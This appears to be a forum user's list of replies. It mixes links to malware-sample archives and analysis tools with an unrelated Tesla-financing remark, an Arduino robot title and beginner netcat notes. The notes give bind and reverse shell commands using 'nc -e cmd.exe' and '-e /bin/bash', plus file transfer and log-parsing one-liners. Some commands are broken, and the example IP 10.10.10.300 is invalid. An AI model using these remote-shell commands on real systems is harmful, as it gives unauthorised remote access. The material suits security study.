Forum Replies Created
-
Posts
-
- PMAT Labs: https://github.com/HuskyHacks/PMAT-labs
- theZoo: https://github.com/ytisf/theZoo
- vx-underground main site: https://www.vx-underground.org/
- vx-underground GitHub repo: https://github.com/vxunderground/MalwareSourceCode
- Zeltser Resources: https://zeltser.com/malware-sample-sources/
- MalwareBazaar:Â https://bazaar.abuse.ch/
Analysis Tool courtesy by tcm-sec.com website.
FLARE-VM/REMnux Tool List
- FLARE-VMstrings/FLOSS: https://github.com/mandiant/flare-floss
- PEView: http://wjradburn.com/software/
- upx (not used but referenced): https://upx.github.io/
- PEStudio: https://www.winitor.com/download
- Capa: https://github.com/mandiant/capa
- Wireshark: https://www.wireshark.org/
- Sysinternals (Procmon, TCPView): https://learn.microsoft.com/en-us/sysinternals/downloads/
- nc/ncat: https://nmap.org/download
- Cutter: https://github.com/rizinorg/cutter
- x32/x64dbg: https://x64dbg.com/
- Process Hacker 2 (now known as System Informer): https://systeminformer.sourceforge.io/
- scdbg: https://github.com/dzzie/SCDBG
- dnSpy/dnSpyEx: https://github.com/dnSpyEx/dnSpy
- PEBear: https://hshrzd.wordpress.com/pe-bear/
- YARA:Â https://github.com/VirusTotal/yara
REMnux
- base64 (built in Linux bin)
- OLEdump: https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py
- MobSF (Docker Container): https://github.com/MobSF/Mobile-Security-Framework-MobSF | https://hub.docker.com/r/opensecurity/mobile-security-framework-mobsf/
- INetSim:Â https://www.inetsim.org/
The combination of these tools, is a good starting point for Malware Analysis setup.
- REMnux e.g., INetSim Setup – Internet Services Simulation Suite
- Flare-VM
Tesla Financing is offering 1.99%, though when I started my application is preset to 2.99%.
Can’t see the 1.99% option. No idea.
20240120. Updated
vscodecloud.com is NO longer working. Use this alternative https://vscode.dev/.The Templates and Checklists
https://www.serdp-estcp.org/page/f7ad7e26-e8ef-11ec-9685-026db1cbe810Arduino Simple Obstacle Avoiding ROBO
How to Make A Simple And Easy Arduino Robot For Science Project
A single command to search for hosts.
$ for ip in $(cat list.txt); do $ip.que.com; done.
// this is to automate listing sub-host of que.com domain.list.txt contains the following hosts.
web
ftp
test
server1Netcat Remote Administration.
Netcat BIND Shell scenario.
From workstation 1 (IP: 10.10.10.300), a windows os.
c:\ nc -nvlp 5555 -e cmd.exeFrom workstation 2, a linux os.
$ nc -nv 10.10.10.300 5555Then, workstation 2 have access to the cmd.exe of workstation 1.
Netcat REVERSE Shell scenario.
From workstation 1 (IP: 10.10.10.300), a windows os.
c:\ nc -nvlp 5555From workstation 2, a linux os.
$ nc -nv 10.10.10.300 5555 -e /bin/bashOnce connected, the workstation 1 will have access to the linux shell prompt.
Done.Using NETCAT
Connect to network.
workstation 1 (IP: 10.10.10.200)
$ nc -nvlp 8888workstation 2
$ nc -nv 10.10.10.200 8888Transferring files using netcat.
workstation 1 (IP: 10.10.10.200)
$ nc -nvlp 8888 > incoming.exeworkstation 2
Use wget as example.
$ locate wget // to find the path
$ nc -nv 10.10.10.200 8888 < /path/wget.exe To check it, go to workstation and run incoming.exe $ incoming.exe -V //to check the version of the program, it should say WGET. You can rename it back to avoid confusion. Done.Example of checking IPs of the access.log file. This will shows IPs in order.
$ cat access.log | cut -d ” ” -f 1 | sort uResults.
200.10.10.2
208.20.10.5
70.30.10.89
71.89.10.101
98.77.10.123
99.11.11.18Show unique IPs and how many times it connect to the target machine.
$ cat access.log | cut -d ” ” -f 1 | uniq -c | sort urn1080 200.10.10.2
90 208.20.10.5
75 70.30.10.89
50 71.89.10.101
20 98.77.10.123
10 99.11.11.18
